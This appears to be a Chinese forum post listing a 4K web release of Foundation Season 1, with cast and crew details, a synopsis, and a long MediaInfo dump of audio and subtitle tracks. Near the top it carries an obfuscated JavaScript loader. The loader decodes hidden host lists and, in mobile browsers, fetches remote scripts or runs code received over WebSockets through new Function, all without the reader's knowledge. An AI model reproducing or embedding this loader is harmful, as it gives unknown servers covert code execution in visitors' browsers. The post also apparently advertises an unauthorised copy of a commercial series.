基地[中文字幕].Foundation.S01.2160p.ATVP.WEB-DL.DDP5.1.Atmos.DV.HEVC 40.50GB

版主小s 19天前 201

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x48\x6a\x79\x50\x6e\x4a\x66\x6d\x45\x43']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNrZGxmamtkLnhpbbnlhbbnNhYXMuY29tLGh0dHBzOi8vbb2pza2RramZrbbGQuaG9uZ3J1aWt0LmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译 名 基地 / 银河帝国:基地 / 银河帝国基地

◎片 名 Foundation

◎年 代 2021

◎产 地 美国

◎类 别 科幻

◎语 言 英语

◎上映日期 2021-09-24(美国)

◎IMDb链接 https://www.imdb.com/title/tt0804484/

◎豆瓣链接 https://movie.douban.com/subject/3161109/

◎集 数 10

◎导 演 艾利克斯·格雷夫斯 Alex Graves (id:1321467)

詹妮弗·彭 Jennifer Phang (id:1294434)

罗克珊·道森 Roxann Dawson (id:1049763)

鲁伯特·桑德斯 Rupert Sanders (id:1320096)

◎编 剧 大卫·S·高耶 David S. Goyer (id:1036537)

乔什·弗莱德曼 Josh Friedman (id:1340781)

艾萨克·阿西莫夫 Isaac Asimov (id:1014250)

凯特琳·桑德斯 Caitlin Saunders (id:1445112)

莎拉·诺伦 Sarah Nolen (id:1445111)

萨拉丁·艾哈迈德 Saladin Ahmed (id:1445108)

马库斯·加德利 Marcus Gardley (id:1445106)

利·达娜·杰克逊 Leigh Dana Jackson (id:1445107)

劳伦·贝洛 Lauren Bello (id:1445105)

维多利亚·莫罗 Victoria Morrow (id:1445110)

◎演 员 杰瑞德·哈里斯 Jared Harris (id:1049700)

李·佩斯 Lee Pace (id:1018975)

卢洛·贝尔 Lou Llobell (id:1434343)

利亚 哈维 Leah Harvey (id:1434338)

里斯·谢尔史密斯 Reece Shearsmith (id:1050114)

劳拉·布林 Laura Birn (id:1207636)

卡西安·比尔顿 Cassian Bilton (id:1434336)

泰伦斯·曼 Terrence Mann (id:1121027)

丹尼尔·麦克弗森 Daniel MacPherson (id:1122211)

泰尼亚·米勒 T'Nia Miller (id:1376207)

普拉维斯·拉纳 Pravessh Rana (id:1454075)

库布拉·萨特 Kubbra Sait (id:1378744)

克拉克·彼得斯 Clarke Peters (id:1126976)

尼基尔·帕尔玛 Nikhil Parmar (id:1448516)

米多·哈马达 Mido Hamada (id:1328612)

巴迪·斯凯尔顿 Buddy Skelton (id:1444980)

艾米·泰格 Amy Tyger (id:1351344)

杰弗里·坎特尔 Geoffrey Cantor (id:1322854)

朱丽亚·法里诺 Julia Farino (id:1413275)

布莱恩F.穆尔维 Brian F. Mulvey (id:1444571)

达拉·奥图尔 Darragh O'Toole (id:1373759)

库珀·卡特 Cooper Carter (id:1444981)

金·阿迪斯 Kim Adis (id:1394213)

穆里斯·克劳雷 Muiris Crowley (id:1336206)

马克·拉弗里 Mark Lavery (id:1374722)

阿尔弗雷德·伊诺奇 Alfred Enoch (id:1036782)

阿卜杜勒·阿尔沙瑞夫 Abdul Alshareef (id:1397698)

萨米尔·富赫斯 Samir Fuchs (id:1378476)

乔格·尼可洛夫 Georg Nikoloff (id:1354215)

维多利亚·莫罗 Victoria Morrow (id:1445110)

利·达娜·杰克逊 Leigh Dana Jackson (id:1445107)

丹尼·鲁尔曼 Danny Ruhlmann (id:1296316)

提科·普拉卡基斯 Tico Poulakakis (id:1449734)

◎标 签 科幻 / 阿西莫夫 / 美剧 / 基地 / 史诗 / 美国 / 小说改编 / 太空

◎简 介

人类蜗居在银河系的一个小角落——太阳系,在围绕太阳旋转的第三颗行星上,生活了十多万年之久。

人类在这个小小的行星(他们称之为“地球”)上,建立了两百多个不同的行政区域(他们称之为“国家”),直到地球上诞生了第一个会思考的机器人。

在机器人的帮助下,人类迅速掌握了改造外星球的技术,开启了恢弘的星际殖民运动;人类在银河系如蝗虫般繁衍扩张,带着他们永不磨灭的愚昧与智慧、贪婪与良知,登上了一个个荒凉的星球,并将银河系卷入漫长的星际战国时代,直至整个银河被统一,一个统治超过2500万个住人行星、疆域横跨十万光年、总计数兆亿人口的庞大帝国崛起——银河帝国。

一个微妙的转折发生在银河帝国建国后的12020年。哈里·谢顿,这个刚满32岁的年轻数学家,开创了“心理史学”,这门学科能用数学公式准确推演全人类的未来——“预言”从此成为一门可以信任的科学,人类由此可以看见未...

◎获奖情况 (共1项)

第7届豆瓣电影年度榜单 (2020)

最值得期待的剧集(提名)

  1. ##### MediaInfo ######

  2. General

  3. Complete name : Foundation.S01E03.The.Ma[email protected]BBQDDQ.COM.mp4

  4. Format : MPEG-4

  5. Format profile : Base Media

  6. Codec ID : isom (isom)

  7. File size : 11.1 GiB

  8. Duration : 49 min 39 s

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 31.9 Mb/s

  11. Encoded date : UTC 2021-10-04 15:16:00

  12. Tagged date : UTC 2021-10-04 15:16:00


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. HDR format : Dolby Vision, Version 1.0, dvhe.05.06, BL+RPU

  19. Codec ID : dvhe

  20. Codec ID/Info : High Efficiency Video Coding with Dolby Vision

  21. Duration : 49 min 39 s

  22. Bit rate : 24.2 Mb/s

  23. Width : 3 840 pixels

  24. Height : 1 920 pixels

  25. Display aspect ratio : 2.000

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.137

  32. Stream size : 8.39 GiB (76%)

  33. Default : No

  34. Encoded date : UTC 2021-10-04 15:14:03

  35. Tagged date : UTC 2021-10-04 15:17:31

  36. Codec configuration box : hvcC+dvcC


  37. Audio #1

  38. ID : 2

  39. Format : E-AC-3 JOC

  40. Format/Info : Enhanced AC-3 with Joint Object Coding

  41. Commercial name : Dolby Digital Plus with Dolby Atmos

  42. Codec ID : ec-3

  43. Duration : 49 min 39 s

  44. Bit rate mode : Constant

  45. Bit rate : 768 kb/s

  46. Maximum bit rate : 811 kb/s

  47. Channel(s) : 6 channels

  48. Channel layout : L R C LFE Ls Rs

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 31.250 FPS (1536 SPF)

  51. Compression mode : Lossy

  52. Stream size : 273 MiB (2%)

  53. Title : English

  54. Language : English

  55. Service kind : Complete Main

  56. Encoded date : UTC 2021-10-04 15:16:45

  57. Tagged date : UTC 2021-10-04 15:17:31

  58. Complexity index : Not present / 16

  59. Number of dynamic objects : 15

  60. Bed channel count : 1 channel

  61. Bed channel configuration : LFE


  62. Audio #2

  63. ID : 3

  64. Format : E-AC-3 JOC

  65. Format/Info : Enhanced AC-3 with Joint Object Coding

  66. Commercial name : Dolby Digital Plus with Dolby Atmos

  67. Codec ID : ec-3

  68. Duration : 49 min 39 s

  69. Bit rate mode : Constant

  70. Bit rate : 768 kb/s

  71. Maximum bit rate : 811 kb/s

  72. Channel(s) : 6 channels

  73. Channel layout : L R C LFE Ls Rs

  74. Sampling rate : 48.0 kHz

  75. Frame rate : 31.250 FPS (1536 SPF)

  76. Compression mode : Lossy

  77. Stream size : 273 MiB (2%)

  78. Title : Fran?ais

  79. Language : French

  80. Service kind : Complete Main

  81. Encoded date : UTC 2021-10-04 15:16:49

  82. Tagged date : UTC 2021-10-04 15:17:31

  83. Complexity index : Not present / 16

  84. Number of dynamic objects : 15

  85. Bed channel count : 1 channel

  86. Bed channel configuration : LFE


  87. Audio #3

  88. ID : 4

  89. Format : E-AC-3 JOC

  90. Format/Info : Enhanced AC-3 with Joint Object Coding

  91. Commercial name : Dolby Digital Plus with Dolby Atmos

  92. Codec ID : ec-3

  93. Duration : 49 min 39 s

  94. Bit rate mode : Constant

  95. Bit rate : 768 kb/s

  96. Maximum bit rate : 811 kb/s

  97. Channel(s) : 6 channels

  98. Channel layout : L R C LFE Ls Rs

  99. Sampling rate : 48.0 kHz

  100. Frame rate : 31.250 FPS (1536 SPF)

  101. Compression mode : Lossy

  102. Stream size : 273 MiB (2%)

  103. Title : Fran?ais

  104. Language : French

  105. Service kind : Complete Main

  106. Encoded date : UTC 2021-10-04 15:16:54

  107. Tagged date : UTC 2021-10-04 15:17:31

  108. Complexity index : Not present / 16

  109. Number of dynamic objects : 15

  110. Bed channel count : 1 channel

  111. Bed channel configuration : LFE


  112. Audio #4

  113. ID : 5

  114. Format : E-AC-3 JOC

  115. Format/Info : Enhanced AC-3 with Joint Object Coding

  116. Commercial name : Dolby Digital Plus with Dolby Atmos

  117. Codec ID : ec-3

  118. Duration : 49 min 39 s

  119. Bit rate mode : Constant

  120. Bit rate : 768 kb/s

  121. Maximum bit rate : 811 kb/s

  122. Channel(s) : 6 channels

  123. Channel layout : L R C LFE Ls Rs

  124. Sampling rate : 48.0 kHz

  125. Frame rate : 31.250 FPS (1536 SPF)

  126. Compression mode : Lossy

  127. Stream size : 273 MiB (2%)

  128. Title : Deutsch

  129. Language : German

  130. Service kind : Complete Main

  131. Encoded date : UTC 2021-10-04 15:16:58

  132. Tagged date : UTC 2021-10-04 15:17:31

  133. Complexity index : Not present / 16

  134. Number of dynamic objects : 15

  135. Bed channel count : 1 channel

  136. Bed channel configuration : LFE


  137. Audio #5

  138. ID : 6

  139. Format : E-AC-3 JOC

  140. Format/Info : Enhanced AC-3 with Joint Object Coding

  141. Commercial name : Dolby Digital Plus with Dolby Atmos

  142. Codec ID : ec-3

  143. Duration : 49 min 39 s

  144. Bit rate mode : Constant

  145. Bit rate : 768 kb/s

  146. Maximum bit rate : 811 kb/s

  147. Channel(s) : 6 channels

  148. Channel layout : L R C LFE Ls Rs

  149. Sampling rate : 48.0 kHz

  150. Frame rate : 31.250 FPS (1536 SPF)

  151. Compression mode : Lossy

  152. Stream size : 273 MiB (2%)

  153. Title : Italiano

  154. Language : Italian

  155. Service kind : Complete Main

  156. Encoded date : UTC 2021-10-04 15:17:02

  157. Tagged date : UTC 2021-10-04 15:17:31

  158. Complexity index : Not present / 16

  159. Number of dynamic objects : 15

  160. Bed channel count : 1 channel

  161. Bed channel configuration : LFE


  162. Audio #6

  163. ID : 7

  164. Format : E-AC-3 JOC

  165. Format/Info : Enhanced AC-3 with Joint Object Coding

  166. Commercial name : Dolby Digital Plus with Dolby Atmos

  167. Codec ID : ec-3

  168. Duration : 49 min 39 s

  169. Bit rate mode : Constant

  170. Bit rate : 768 kb/s

  171. Maximum bit rate : 811 kb/s

  172. Channel(s) : 6 channels

  173. Channel layout : L R C LFE Ls Rs

  174. Sampling rate : 48.0 kHz

  175. Frame rate : 31.250 FPS (1536 SPF)

  176. Compression mode : Lossy

  177. Stream size : 273 MiB (2%)

  178. Title : 日本語

  179. Language : Japanese

  180. Service kind : Complete Main

  181. Encoded date : UTC 2021-10-04 15:17:07

  182. Tagged date : UTC 2021-10-04 15:17:31

  183. Complexity index : Not present / 16

  184. Number of dynamic objects : 15

  185. Bed channel count : 1 channel

  186. Bed channel configuration : LFE


  187. Audio #7

  188. ID : 8

  189. Format : E-AC-3 JOC

  190. Format/Info : Enhanced AC-3 with Joint Object Coding

  191. Commercial name : Dolby Digital Plus with Dolby Atmos

  192. Codec ID : ec-3

  193. Duration : 49 min 39 s

  194. Bit rate mode : Constant

  195. Bit rate : 768 kb/s

  196. Maximum bit rate : 811 kb/s

  197. Channel(s) : 6 channels

  198. Channel layout : L R C LFE Ls Rs

  199. Sampling rate : 48.0 kHz

  200. Frame rate : 31.250 FPS (1536 SPF)

  201. Compression mode : Lossy

  202. Stream size : 273 MiB (2%)

  203. Title : Português

  204. Language : Portuguese

  205. Service kind : Complete Main

  206. Encoded date : UTC 2021-10-04 15:17:11

  207. Tagged date : UTC 2021-10-04 15:17:31

  208. Complexity index : Not present / 16

  209. Number of dynamic objects : 15

  210. Bed channel count : 1 channel

  211. Bed channel configuration : LFE


  212. Audio #8

  213. ID : 9

  214. Format : E-AC-3 JOC

  215. Format/Info : Enhanced AC-3 with Joint Object Coding

  216. Commercial name : Dolby Digital Plus with Dolby Atmos

  217. Codec ID : ec-3

  218. Duration : 49 min 39 s

  219. Bit rate mode : Constant

  220. Bit rate : 768 kb/s

  221. Maximum bit rate : 811 kb/s

  222. Channel(s) : 6 channels

  223. Channel layout : L R C LFE Ls Rs

  224. Sampling rate : 48.0 kHz

  225. Frame rate : 31.250 FPS (1536 SPF)

  226. Compression mode : Lossy

  227. Stream size : 273 MiB (2%)

  228. Title : русский язык

  229. Language : Russian

  230. Service kind : Complete Main

  231. Encoded date : UTC 2021-10-04 15:17:14

  232. Tagged date : UTC 2021-10-04 15:17:31

  233. Complexity index : Not present / 16

  234. Number of dynamic objects : 15

  235. Bed channel count : 1 channel

  236. Bed channel configuration : LFE


  237. Audio #9

  238. ID : 10

  239. Format : E-AC-3 JOC

  240. Format/Info : Enhanced AC-3 with Joint Object Coding

  241. Commercial name : Dolby Digital Plus with Dolby Atmos

  242. Codec ID : ec-3

  243. Duration : 49 min 39 s

  244. Bit rate mode : Constant

  245. Bit rate : 768 kb/s

  246. Maximum bit rate : 811 kb/s

  247. Channel(s) : 6 channels

  248. Channel layout : L R C LFE Ls Rs

  249. Sampling rate : 48.0 kHz

  250. Frame rate : 31.250 FPS (1536 SPF)

  251. Compression mode : Lossy

  252. Stream size : 273 MiB (2%)

  253. Title : Espa?ol?(Latinoamérica)

  254. Language : Spanish

  255. Service kind : Complete Main

  256. Encoded date : UTC 2021-10-04 15:17:18

  257. Tagged date : UTC 2021-10-04 15:17:31

  258. Complexity index : Not present / 16

  259. Number of dynamic objects : 15

  260. Bed channel count : 1 channel

  261. Bed channel configuration : LFE


  262. Audio #10

  263. ID : 11

  264. Format : E-AC-3 JOC

  265. Format/Info : Enhanced AC-3 with Joint Object Coding

  266. Commercial name : Dolby Digital Plus with Dolby Atmos

  267. Codec ID : ec-3

  268. Duration : 49 min 39 s

  269. Bit rate mode : Constant

  270. Bit rate : 768 kb/s

  271. Maximum bit rate : 811 kb/s

  272. Channel(s) : 6 channels

  273. Channel layout : L R C LFE Ls Rs

  274. Sampling rate : 48.0 kHz

  275. Frame rate : 31.250 FPS (1536 SPF)

  276. Compression mode : Lossy

  277. Stream size : 273 MiB (2%)

  278. Title : Espa?ol?(Espa?a)

  279. Language : Spanish

  280. Service kind : Complete Main

  281. Encoded date : UTC 2021-10-04 15:17:21

  282. Tagged date : UTC 2021-10-04 15:17:31

  283. Complexity index : Not present / 16

  284. Number of dynamic objects : 15

  285. Bed channel count : 1 channel

  286. Bed channel configuration : LFE


  287. Text #1

  288. ID : 12

  289. Format : Timed Text

  290. Codec ID : tx3g

  291. Duration : 48 min 35 s

  292. Bit rate mode : Variable

  293. Bit rate : 56 b/s

  294. Stream size : 19.8 KiB (0%)

  295. Title : English

  296. Language : English

  297. Forced : No

  298. Encoded date : UTC 2021-10-04 15:17:25

  299. Tagged date : UTC 2021-10-04 15:17:31


  300. Text #2

  301. ID : 13

  302. Format : Timed Text

  303. Codec ID : tx3g

  304. Duration : 49 min 35 s

  305. Bit rate mode : Variable

  306. Bit rate : 79 b/s

  307. Stream size : 28.5 KiB (0%)

  308. Title : ????

  309. Language : Arabic

  310. Forced : No

  311. Encoded date : UTC 2021-10-04 15:17:26

  312. Tagged date : UTC 2021-10-04 15:17:31


  313. Text #3

  314. ID : 14

  315. Format : Timed Text

  316. Codec ID : tx3g

  317. Duration : 49 min 35 s

  318. Bit rate mode : Variable

  319. Bit rate : 80 b/s

  320. Stream size : 29.2 KiB (0%)

  321. Title : български

  322. Language : Bulgarian

  323. Forced : No

  324. Encoded date : UTC 2021-10-04 15:17:26

  325. Tagged date : UTC 2021-10-04 15:17:31


  326. Text #4

  327. ID : 15

  328. Format : Timed Text

  329. Codec ID : tx3g

  330. Duration : 49 min 35 s

  331. Bit rate mode : Variable

  332. Bit rate : 52 b/s

  333. Stream size : 18.7 KiB (0%)

  334. Title : ?esky

  335. Language : Czech

  336. Forced : No

  337. Encoded date : UTC 2021-10-04 15:17:26

  338. Tagged date : UTC 2021-10-04 15:17:31


  339. Text #5

  340. ID : 16

  341. Format : Timed Text

  342. Codec ID : tx3g

  343. Duration : 49 min 35 s

  344. Bit rate mode : Variable

  345. Bit rate : 56 b/s

  346. Stream size : 20.3 KiB (0%)

  347. Title : dansk

  348. Language : Danish

  349. Forced : No

  350. Encoded date : UTC 2021-10-04 15:17:26

  351. Tagged date : UTC 2021-10-04 15:17:31


  352. Text #6

  353. ID : 17

  354. Format : Timed Text

  355. Codec ID : tx3g

  356. Duration : 49 min 35 s

  357. Bit rate mode : Variable

  358. Bit rate : 49 b/s

  359. Stream size : 17.8 KiB (0%)

  360. Title : Nederlands

  361. Language : Dutch

  362. Forced : No

  363. Encoded date : UTC 2021-10-04 15:17:26

  364. Tagged date : UTC 2021-10-04 15:17:31


  365. Text #7

  366. ID : 18

  367. Format : Timed Text

  368. Codec ID : tx3g

  369. Duration : 49 min 35 s

  370. Bit rate mode : Variable

  371. Bit rate : 51 b/s

  372. Stream size : 18.6 KiB (0%)

  373. Title : eesti keel

  374. Language : Estonian

  375. Forced : No

  376. Encoded date : UTC 2021-10-04 15:17:26

  377. Tagged date : UTC 2021-10-04 15:17:31


  378. Text #8

  379. ID : 19

  380. Format : Timed Text

  381. Codec ID : tx3g

  382. Duration : 49 min 35 s

  383. Bit rate mode : Variable

  384. Bit rate : 54 b/s

  385. Stream size : 19.7 KiB (0%)

  386. Title : Vlaams

  387. Language : Finnish

  388. Forced : No

  389. Encoded date : UTC 2021-10-04 15:17:26

  390. Tagged date : UTC 2021-10-04 15:17:31


  391. Text #9

  392. ID : 20

  393. Format : Timed Text

  394. Codec ID : tx3g

  395. Duration : 49 min 4 s

  396. Bit rate mode : Variable

  397. Bit rate : 54 b/s

  398. Stream size : 19.3 KiB (0%)

  399. Title : Fran?ais

  400. Language : French

  401. Forced : No

  402. Encoded date : UTC 2021-10-04 15:17:27

  403. Tagged date : UTC 2021-10-04 15:17:31


  404. Text #10

  405. ID : 21

  406. Format : Timed Text

  407. Codec ID : tx3g

  408. Duration : 49 min 4 s

  409. Bit rate mode : Variable

  410. Bit rate : 54 b/s

  411. Stream size : 19.3 KiB (0%)

  412. Title : Fran?ais

  413. Language : French

  414. Forced : No

  415. Encoded date : UTC 2021-10-04 15:17:27

  416. Tagged date : UTC 2021-10-04 15:17:31


  417. Text #11

  418. ID : 22

  419. Format : Timed Text

  420. Codec ID : tx3g

  421. Duration : 49 min 4 s

  422. Bit rate mode : Variable

  423. Bit rate : 54 b/s

  424. Stream size : 19.3 KiB (0%)

  425. Title : Fran?ais

  426. Language : French

  427. Forced : No

  428. Encoded date : UTC 2021-10-04 15:17:27

  429. Tagged date : UTC 2021-10-04 15:17:31


  430. Text #12

  431. ID : 23

  432. Format : Timed Text

  433. Codec ID : tx3g

  434. Duration : 49 min 38 s

  435. Bit rate mode : Variable

  436. Bit rate : 57 b/s

  437. Stream size : 20.6 KiB (0%)

  438. Title : Deutsch

  439. Language : German

  440. Forced : No

  441. Encoded date : UTC 2021-10-04 15:17:27

  442. Tagged date : UTC 2021-10-04 15:17:31


  443. Text #13

  444. ID : 24

  445. Format : Timed Text

  446. Codec ID : tx3g

  447. Duration : 49 min 35 s

  448. Bit rate mode : Variable

  449. Bit rate : 90 b/s

  450. Stream size : 32.6 KiB (0%)

  451. Title : ελληνικ?

  452. Language : Greek

  453. Forced : No

  454. Encoded date : UTC 2021-10-04 15:17:27

  455. Tagged date : UTC 2021-10-04 15:17:31


  456. Text #14

  457. ID : 25

  458. Format : Timed Text

  459. Codec ID : tx3g

  460. Duration : 49 min 35 s

  461. Bit rate mode : Variable

  462. Bit rate : 71 b/s

  463. Stream size : 25.7 KiB (0%)

  464. Title : ????

  465. Language : Hebrew

  466. Forced : No

  467. Encoded date : UTC 2021-10-04 15:17:27

  468. Tagged date : UTC 2021-10-04 15:17:31


  469. Text #15

  470. ID : 26

  471. Format : Timed Text

  472. Codec ID : tx3g

  473. Duration : 49 min 35 s

  474. Bit rate mode : Variable

  475. Bit rate : 138 b/s

  476. Stream size : 50.1 KiB (0%)

  477. Title : ??????

  478. Language : Hindi

  479. Forced : No

  480. Encoded date : UTC 2021-10-04 15:17:27

  481. Tagged date : UTC 2021-10-04 15:17:31


  482. Text #16

  483. ID : 27

  484. Format : Timed Text

  485. Codec ID : tx3g

  486. Duration : 49 min 35 s

  487. Bit rate mode : Variable

  488. Bit rate : 54 b/s

  489. Stream size : 19.5 KiB (0%)

  490. Title : Magyar

  491. Language : Hungarian

  492. Forced : No

  493. Encoded date : UTC 2021-10-04 15:17:27

  494. Tagged date : UTC 2021-10-04 15:17:31


  495. Text #17

  496. ID : 28

  497. Format : Timed Text

  498. Codec ID : tx3g

  499. Duration : 49 min 35 s

  500. Bit rate mode : Variable

  501. Bit rate : 58 b/s

  502. Stream size : 21.1 KiB (0%)

  503. Title : Indonesia

  504. Language : Indonesian

  505. Forced : No

  506. Encoded date : UTC 2021-10-04 15:17:28

  507. Tagged date : UTC 2021-10-04 15:17:31


  508. Text #18

  509. ID : 29

  510. Format : Timed Text

  511. Codec ID : tx3g

  512. Duration : 49 min 37 s

  513. Bit rate mode : Variable

  514. Bit rate : 57 b/s

  515. Stream size : 20.7 KiB (0%)

  516. Title : Italiano

  517. Language : Italian

  518. Forced : No

  519. Encoded date : UTC 2021-10-04 15:17:28

  520. Tagged date : UTC 2021-10-04 15:17:31


  521. Text #19

  522. ID : 30

  523. Format : Timed Text

  524. Codec ID : tx3g

  525. Duration : 49 min 38 s

  526. Bit rate mode : Variable

  527. Bit rate : 48 b/s

  528. Stream size : 17.3 KiB (0%)

  529. Title : 日本語

  530. Language : Japanese

  531. Forced : No

  532. Encoded date : UTC 2021-10-04 15:17:28

  533. Tagged date : UTC 2021-10-04 15:17:31


  534. Text #20

  535. ID : 31

  536. Format : Timed Text

  537. Codec ID : tx3g

  538. Duration : 49 min 35 s

  539. Bit rate mode : Variable

  540. Bit rate : 57 b/s

  541. Stream size : 20.5 KiB (0%)

  542. Title : ???

  543. Language : Korean

  544. Forced : No

  545. Encoded date : UTC 2021-10-04 15:17:28

  546. Tagged date : UTC 2021-10-04 15:17:31


  547. Text #21

  548. ID : 32

  549. Format : Timed Text

  550. Codec ID : tx3g

  551. Duration : 49 min 35 s

  552. Bit rate mode : Variable

  553. Bit rate : 56 b/s

  554. Stream size : 20.2 KiB (0%)

  555. Title : lietuvi? kalba

  556. Language : Lithuanian

  557. Forced : No

  558. Encoded date : UTC 2021-10-04 15:17:28

  559. Tagged date : UTC 2021-10-04 15:17:31


  560. Text #22

  561. ID : 33

  562. Format : Timed Text

  563. Codec ID : tx3g

  564. Duration : 49 min 35 s

  565. Bit rate mode : Variable

  566. Bit rate : 55 b/s

  567. Stream size : 20.1 KiB (0%)

  568. Title : latvie?u valoda

  569. Language : Latvian

  570. Forced : No

  571. Encoded date : UTC 2021-10-04 15:17:28

  572. Tagged date : UTC 2021-10-04 15:17:31


  573. Text #23

  574. ID : 34

  575. Format : Timed Text

  576. Codec ID : tx3g

  577. Duration : 49 min 35 s

  578. Bit rate mode : Variable

  579. Bit rate : 54 b/s

  580. Stream size : 19.7 KiB (0%)

  581. Title : ???? ?????

  582. Language : Malay

  583. Forced : No

  584. Encoded date : UTC 2021-10-04 15:17:28

  585. Tagged date : UTC 2021-10-04 15:17:31


  586. Text #24

  587. ID : 35

  588. Format : Timed Text

  589. Codec ID : tx3g

  590. Duration : 49 min 35 s

  591. Bit rate mode : Variable

  592. Bit rate : 50 b/s

  593. Stream size : 18.0 KiB (0%)

  594. Title : 中文(简体)

  595. Language : Chinese

  596. Forced : No

  597. Encoded date : UTC 2021-10-04 15:17:28

  598. Tagged date : UTC 2021-10-04 15:17:31


  599. Text #25

  600. ID : 36

  601. Format : Timed Text

  602. Codec ID : tx3g

  603. Duration : 49 min 35 s

  604. Bit rate mode : Variable

  605. Bit rate : 50 b/s

  606. Stream size : 18.3 KiB (0%)

  607. Title : 中文(繁體)

  608. Language : Chinese

  609. Forced : No

  610. Encoded date : UTC 2021-10-04 15:17:29

  611. Tagged date : UTC 2021-10-04 15:17:31


  612. Text #26

  613. ID : 37

  614. Format : Timed Text

  615. Codec ID : tx3g

  616. Duration : 49 min 35 s

  617. Bit rate mode : Variable

  618. Bit rate : 51 b/s

  619. Stream size : 18.6 KiB (0%)

  620. Title : 中文(粤语)

  621. Language : Chinese

  622. Forced : No

  623. Encoded date : UTC 2021-10-04 15:17:29

  624. Tagged date : UTC 2021-10-04 15:17:31


  625. Text #27

  626. ID : 38

  627. Format : Timed Text

  628. Codec ID : tx3g

  629. Duration : 49 min 35 s

  630. Bit rate mode : Variable

  631. Bit rate : 54 b/s

  632. Stream size : 19.5 KiB (0%)

  633. Title : norsk

  634. Language : Norwegian

  635. Forced : No

  636. Encoded date : UTC 2021-10-04 15:17:29

  637. Tagged date : UTC 2021-10-04 15:17:31


  638. Text #28

  639. ID : 39

  640. Format : Timed Text

  641. Codec ID : tx3g

  642. Duration : 49 min 35 s

  643. Bit rate mode : Variable

  644. Bit rate : 52 b/s

  645. Stream size : 19.1 KiB (0%)

  646. Title : J?zyk polski

  647. Language : Polish

  648. Forced : No

  649. Encoded date : UTC 2021-10-04 15:17:29

  650. Tagged date : UTC 2021-10-04 15:17:31


  651. Text #29

  652. ID : 40

  653. Format : Timed Text

  654. Codec ID : tx3g

  655. Duration : 49 min 35 s

  656. Bit rate mode : Variable

  657. Bit rate : 56 b/s

  658. Stream size : 20.2 KiB (0%)

  659. Title : Português

  660. Language : Portuguese

  661. Forced : No

  662. Encoded date : UTC 2021-10-04 15:17:29

  663. Tagged date : UTC 2021-10-04 15:17:31


  664. Text #30

  665. ID : 41

  666. Format : Timed Text

  667. Codec ID : tx3g

  668. Duration : 49 min 35 s

  669. Bit rate mode : Variable

  670. Bit rate : 52 b/s

  671. Stream size : 18.7 KiB (0%)

  672. Title : Português

  673. Language : Portuguese

  674. Forced : No

  675. Encoded date : UTC 2021-10-04 15:17:29

  676. Tagged date : UTC 2021-10-04 15:17:31


  677. Text #31

  678. ID : 42

  679. Format : Timed Text

  680. Codec ID : tx3g

  681. Duration : 48 min 41 s

  682. Bit rate mode : Variable

  683. Bit rate : 82 b/s

  684. Stream size : 29.1 KiB (0%)

  685. Title : русский язык

  686. Language : Russian

  687. Forced : No

  688. Encoded date : UTC 2021-10-04 15:17:29

  689. Tagged date : UTC 2021-10-04 15:17:31


  690. Text #32

  691. ID : 43

  692. Format : Timed Text

  693. Codec ID : tx3g

  694. Duration : 49 min 35 s

  695. Bit rate mode : Variable

  696. Bit rate : 52 b/s

  697. Stream size : 18.8 KiB (0%)

  698. Title : sloven?ina

  699. Language : Slovak

  700. Forced : No

  701. Encoded date : UTC 2021-10-04 15:17:29

  702. Tagged date : UTC 2021-10-04 15:17:31


  703. Text #33

  704. ID : 44

  705. Format : Timed Text

  706. Codec ID : tx3g

  707. Duration : 49 min 35 s

  708. Bit rate mode : Variable

  709. Bit rate : 47 b/s

  710. Stream size : 17.2 KiB (0%)

  711. Title : sloven??ina

  712. Language : Slovenian

  713. Forced : No

  714. Encoded date : UTC 2021-10-04 15:17:30

  715. Tagged date : UTC 2021-10-04 15:17:31


  716. Text #34

  717. ID : 45

  718. Format : Timed Text

  719. Codec ID : tx3g

  720. Duration : 49 min 35 s

  721. Bit rate mode : Variable

  722. Bit rate : 55 b/s

  723. Stream size : 20.0 KiB (0%)

  724. Title : Espa?ol?(Latinoamérica)

  725. Language : Spanish

  726. Forced : No

  727. Encoded date : UTC 2021-10-04 15:17:30

  728. Tagged date : UTC 2021-10-04 15:17:31


  729. Text #35

  730. ID : 46

  731. Format : Timed Text

  732. Codec ID : tx3g

  733. Duration : 49 min 35 s

  734. Bit rate mode : Variable

  735. Bit rate : 55 b/s

  736. Stream size : 20.0 KiB (0%)

  737. Title : Espa?ol?(Espa?a)

  738. Language : Spanish

  739. Forced : No

  740. Encoded date : UTC 2021-10-04 15:17:30

